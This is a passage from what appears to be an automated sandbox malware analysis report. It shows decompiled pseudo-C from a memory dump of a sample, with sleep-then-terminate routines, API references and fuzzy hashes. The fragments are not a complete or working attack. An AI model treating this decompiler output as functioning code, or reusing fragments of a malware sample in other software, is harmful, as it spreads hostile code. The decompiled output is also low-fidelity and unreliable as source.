                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}







                0x00401822
                0x00401822
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 17%
                			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t8;
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("sbb ebx, ebp");
                				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401826
                0x00401826
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 20%
                			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t10;
                				void* _t13;
                				intOrPtr* _t19;
                				void* _t22;
                				void* _t25;
                
                				_t26 = __eflags;
                				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                				_t19 =  *((intOrPtr*)(_t25 + 8));
                				Sleep(0x1388);
                				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                				if(_t13 != 0) {
                					_push( *((intOrPtr*)(_t25 + 0x14)));
                					_push( *((intOrPtr*)(_t25 - 4)));
                					_push(_t13);
                					_push(_t19); // executed
                					L00401455(0x60, _t22, __edi); // executed
                				}
                				 *_t19(0xffffffff, 0); // executed
                				_t19 = _t19 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401834
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                Uniqueness

                Uniqueness Score: -1.00%